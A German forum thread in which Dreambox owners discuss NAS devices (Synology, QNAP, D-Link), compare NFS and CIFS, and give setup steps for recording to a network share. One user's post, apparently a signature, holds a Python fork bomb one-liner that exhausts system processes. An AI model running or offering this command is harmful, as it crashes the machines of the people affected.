500er mit NAS oder eSATA?

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • NFS ist ein Netzwerkprotokoll für UNIX/Linux, mit CIFS/Samba kann man auf Windows freigaben zugreifen. NFS ist auf der Dream in der Tat performanter.

      Was das NAS anbelangt: Ich habe ein "billiges" D-LINK DNS-323 mit einem NFS-Server auf USB (fun_plug) - macht im Zusammenspiel mit der Dream, alles was ich will ....
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Fred Bogus Trumper ()

    • Original von hai567
      Hm, hört sich nicht so prall an. Wobei man halt auch nie weiß, wem man was glauben soll.
      Is wie immer. Frag 10 Leute und du bekommst 11 verschiedene Meinungen. Manche finden Qnap gut und reden Synology schlecht, manche finden Synology gut und reden Qnap schlecht.
      Fakt ist, dass wohl beide NAS sehr gut sind und auch mit der Dreambox funktionieren.

      Was ist denn eigentlich der genaue Unterschied zwischen NFS und CIFS? So wie ich das raushöre scheint ja NFS besser zu sein.

      Und die Qnap Geräte können das alles, was hier beim Synology bemängelt wurde?


      Keine Ahnung ob Synology schlecht ist oder gut, hatte noch keinen in der Hand
      nur in der Verbindung mit der Dreambox und dem NFS Problem würde es mir persönlich
      nicht gefallen.
      Ich hab ein QNAP TS-210 und das läuft super mit der Dreambox (NFS) mehr kann ich dazu nicht sagen.

      Erklärung zu NFS und CIFS hat Fred ja schon geschrieben.

      Auf jeden fall hat mein QNAP nicht die Mängel des Synology welche derjenige in seinem Bericht beschrieben hat und mehr kann ich dazu auch nicht sagen.

      Was man käuft muß jeder für sich selbst entscheiden ;)
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)
    • Original von linus76
      Wie gesagt ich habe 2 Synology über CIFS und keinerlei Probleme oder Geschwindigkeitsverluste.


      ...wenn ich mir die Boxen in Deiner Sig anschaue und diese Aussage auf alle Boxen unter allen Umständen beziehe, dann würde ich das in die Kategorie Wunschdenken einordnen. ;) Die Synology gleicht jedenfalls die Netzwerk-Schwächen der normalen 500er und der 800HD nicht aus ;).


      Alles ziemlich OT.......
    • Original von NASeweiss
      Original von linus76
      Wie gesagt ich habe 2 Synology über CIFS und keinerlei Probleme oder Geschwindigkeitsverluste.


      ...wenn ich mir die Boxen in Deiner Sig anschaue und diese Aussage auf alle Boxen unter allen Umständen beziehe, dann würde ich das in die Kategorie Wunschdenken einordnen. ;) Die Synology gleicht jedenfalls die Netzwerk-Schwächen der normalen 500er und der 800HD nicht aus ;).


      Alles ziemlich OT.......


      Wir reden hier ja von der DM500HD, und da läuft alles Problemlos, aber auch bei der DM800HD kann man ohne ruckler schauen. Aufnehmen hab ich noch nicht probiert, bei der 800er.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • @ hai567

      dann kauf dir eins und freu dich evtl. darüber:

      "linux" support (also nfs) ist auch so ne sache: da auf dem
      geraet kein statd laueft, ist das nfs als home-directory nicht zu brauchen (keine
      file-locks), den mit hilfe des 3-party dev guide und der cross-toolchain von synology
      nachzuinstallieren ist dem erfahrenen linux-admin moeglich, aber muehsam
      kleinigkeit fuer die devs, aber im klartext: nfs ist unbrauchbar.

      :P :P :P :P :P :P :P :P :P
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)
    • Original von linus76
      Wir reden hier ja von der DM500HD, und da läuft alles Problemlos,


      ..richtig: 500HD und 8000er haben genug Power um auch vernünftiges CIFS-Streaming hinzukriegen. Ich hatte Deine Postings allerdings bisher so verstanden, dass Du das auf Deine Synology zurückführst die da einen wesentlichen Anteil dran hätte (was schlicht nicht der Fall ist)....falls ich Dich da falsch verstanden haben sollte: Sorry.

      @Chris

      ...für das NFS-Streaming mit den Dreams ist dieser Makel nicht wirklich von Bedeutung ;). Es funktioniert trotzdem - auch will man im genannten Anwendungsfall ja eben kein File-Locking; und zum "Leben" braucht die Dream das NAS auch nicht wirklich...das von Dir zitierte Fazit (ich weiss, dass es nicht dein eigenes ist) ist aus meiner Sicht ein klein wenig überzogen. 8)
    • @ NASeweiss

      Ich weiss auch weiss ich das du von der Materie sehr viel Ahnung hast :)

      Aber ich wollte auch mal eine Zunge rausstrecken :D
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von chriskula ()

    • sooo,
      habe nun ein qnap, die 500er ist angeschlossen, aber es funktioniert nicht so, wie ich will :/

      habe per netzwerkbrowser das nas gefunden und einen default-eintrag ausgewählt (Qrecordings)
      benutzer und pass stimmen.
      jetzt geh ich auf die recording path und weiter?
      hatte das so verstanden, dass wenn ich use as HDD replacement auf ja stelle, dass ich dann den mount auf /media/hdd hätte.
      wenn ich das bei den recording path einstelle, sagt er mir immer, dass er nur 20mb freien platz hat, also versucht er den internen speicher.
      was mache ich falsch?!

      der st@@tz
    • Hast du das im QNAP gemacht? :

      1. Netzwerkdienst - NFS Dienst - NFS-Dienst aktivieren
      2. in deinem Fall:
      Zugriffskontrolle - Freigabeordner- (Qrecordings Ordner für NFS Dienst freigeben) auf NFS-Button drücken - NFS Zugangsteuerung - keine Beschränkung - Übernehmen

      auf der 500 HD
      menü taste
      Einstellungen
      System
      Recording Path
      Delault movie location /media/net/Qrecordings
      Timer-Aufnahmeverzeichnis /media/net/Qrecordings
      Sofortaufnahme-Verzeichnis /media/net/Qrecordings
      Timeshift Verzeichnis /media/net/Qrecordings

      mit grüner Taste speichern
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)
    • Alles spielzeug :D :D

      Quellcode

      1. Linux gentoo-nas 2.6.34-gentoo-r2 #2 SMP Sat Jul 17 17:16:25 CEST 2010 x86_64 Intel(R) Atom(TM) CPU 330 @ 1.60GHz GenuineIntel GNU/Linux
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von Fred Bogus Trumper
      Was das NAS anbelangt: Ich habe ein "billiges" D-LINK DNS-323 mit einem NFS-Server auf USB (fun_plug) - macht im Zusammenspiel mit der Dream, alles was ich will ....


      Was machst du da genau, kann der D-Link NAS kein NFS von Haus aus?

      Tschö,
      Igor
      DM920, HD+NAS, DVB-S2 FBC